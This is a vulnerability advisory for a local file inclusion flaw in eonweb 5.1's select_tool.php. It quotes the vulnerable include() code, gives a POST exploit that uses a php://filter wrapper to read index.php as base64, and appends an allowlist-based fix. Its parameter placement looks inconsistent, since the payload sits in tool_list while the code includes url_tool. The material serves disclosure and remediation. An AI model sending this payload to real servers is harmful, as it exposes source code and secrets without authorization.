Eonweb_module_tool_all_select_tool.php file include

Powered by minhaizhao from Anyuntec

version: 5.1

https://github.com/EyesOfNetworkCommunity/eonweb

Vulnerability details

0x01

/srv/eyesofnetwork/eonweb-5.1/module/tool_all/select_tool.php Line 58

if( $page != "" )
{
    if( $host_list == "" ){
        message(4,"Please select a host","critical");
    }
    else{
        // hostname selected.
        $tab_host=explode(",",$host_list);
        $host_name = $tab_host[0];
        $host = $host_name;

        if($host == "") message(4,"Please select a host","critical");
        else{
            // Vulnerable: $url_tool reaches include() without any filtering.
            include($url_tool);
        }
    }
}

$url_tool is passed to include() without being filtered, which results in a file inclusion vulnerability.

EXP:

https://192.168.91.66/module/tool_all/select_tool.php

POST:

tool_list=php://filter/read=convert.base64-encode/resource=index.php&&snmp_version=1&page=2&host_list=1&url_tool=

The response contains the base64-encoded contents of index.php.
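
One way to close this class of bug is to map the requested tool to a fixed file through an allowlist instead of passing request data to include(). The following is an added example, not eonweb code and not the project's fix; the `tools` directory, the tool names and the `resolve_tool` helper are hypothetical.

```php
<?php
// Added example (not eonweb code): resolve a user-supplied tool name to an
// include path through a fixed allowlist instead of including it directly.

// Hypothetical directory and tool file names, for illustration only.
const TOOL_DIR = __DIR__ . '/tools';
const ALLOWED_TOOLS = [
    'ping'     => 'ping.php',
    'snmpwalk' => 'snmpwalk.php',
];

/**
 * Return the absolute path of an allowlisted tool, or null if the request
 * must be rejected. The caller includes only a non-null result.
 */
function resolve_tool(string $requested, string $toolDir = TOOL_DIR): ?string
{
    // Only exact allowlist keys are accepted, so "php://filter/..." wrappers,
    // "../" sequences and absolute paths never reach the filesystem.
    if (!array_key_exists($requested, ALLOWED_TOOLS)) {
        return null;
    }

    $base = realpath($toolDir);
    $path = realpath($toolDir . '/' . ALLOWED_TOOLS[$requested]);

    // Defence in depth: the resolved file must exist and stay inside the
    // tool directory, even if a symlink was planted there.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: the wrapper value from the request above, a traversal
// string, and a valid key (which resolves only if tools/ping.php exists).
$samples = [
    'php://filter/read=convert.base64-encode/resource=index.php',
    '../../index.php',
    'ping',
];
foreach ($samples as $s) {
    printf("%-60s => %s\n", $s, resolve_tool($s) ?? 'REJECTED');
}
```

In the handler, the include would run only when `resolve_tool()` returns a non-null path, and a rejected value is worth logging because a stream wrapper in this parameter has no legitimate use.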
